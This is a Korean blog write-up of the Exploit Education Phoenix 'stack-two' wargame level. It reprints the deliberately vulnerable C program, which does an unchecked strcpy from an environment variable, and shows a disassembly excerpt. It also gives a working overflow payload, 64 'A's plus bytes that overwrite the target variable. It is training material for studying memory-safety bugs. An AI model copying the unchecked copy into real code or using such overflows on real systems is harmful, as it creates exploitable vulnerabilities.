728x90
반응형

1. intro

2. code 및 분석

2.1.  C code

/*
 * phoenix/stack-two, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x0d0a090a
 *
 * If you're Russian to get to the bath room, and you are Finnish when you get
 * out, what are you when you are in the bath room?
 *
 * European!
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  char *ptr;

  printf("%s\n", BANNER);

  ptr = getenv("ExploitEducation");
  if (ptr == NULL) {
    errx(1, "please set the ExploitEducation environment variable");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, ptr);

  if (locals.changeme == 0x0d0a090a) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Almost! changeme is currently 0x%08x, we want 0x0d0a090a\n",
        locals.changeme);
  }

  exit(0);
}

 

2.2. 분석

ptr 변수에 ExploitEducation 환경변수를 넣고, 이를 locals.buffer 변수에 복사한다.

그리고 locals.changeme 변수가 0x0d0a090a로 변경되어야 한다.

 

3. 취약점 확인 및 공격 준비

3.1. 취약점

strcpy 시 크기 확인을 하지 않아 overwrite가 가능함.

 

3.2. 공격 준비

buffer 변수의 위치, changeme 변수의 위치만 확인한 뒤 (뭐 비슷하겠지만...) export 명령어를 통해 환경변수에 값을 삽입하면 된다.

...
   0x00000000004006f6 <+73>:    mov    -0x8(%rbp),%rdx
   0x00000000004006fa <+77>:    lea    -0x50(%rbp),%rax
   0x00000000004006fe <+81>:    mov    %rdx,%rsi
   0x0000000000400701 <+84>:    mov    %rax,%rdi
   0x0000000000400704 <+87>:    callq  0x4004d0 <strcpy@plt>
   0x0000000000400709 <+92>:    mov    -0x10(%rbp),%eax
   0x000000000040070c <+95>:    cmp    $0xd0a090a,%eax
...

 

4. exploit

root@phoenix-amd64:/opt/phoenix/amd64# export ExploitEducation=`python -c 'print "A"*0x40+"\x0a\x09\x0a\x0d"'`
root@phoenix-amd64:/opt/phoenix/amd64# export
declare -x ExploitEducation="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

"
declare -x HOME="/root"
...
root@phoenix-amd64:/opt/phoenix/amd64# ./stack-two
Welcome to phoenix/stack-two, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
728x90
반응형
저작자표시 비영리 변경금지 (새창열림)

'Wargame > Exploit Education' 카테고리의 다른 글

[Phoenix] Stack four  (0) 2022.09.27
[Phoenix] Stack three  (0) 2022.09.27
[Phoenix] Stack One  (0) 2022.09.26
[Phoenix] Stack Zero  (0) 2022.09.26
Phoenix 환경 설정 및 참고사항.  (0) 2022.09.26

티스토리툴바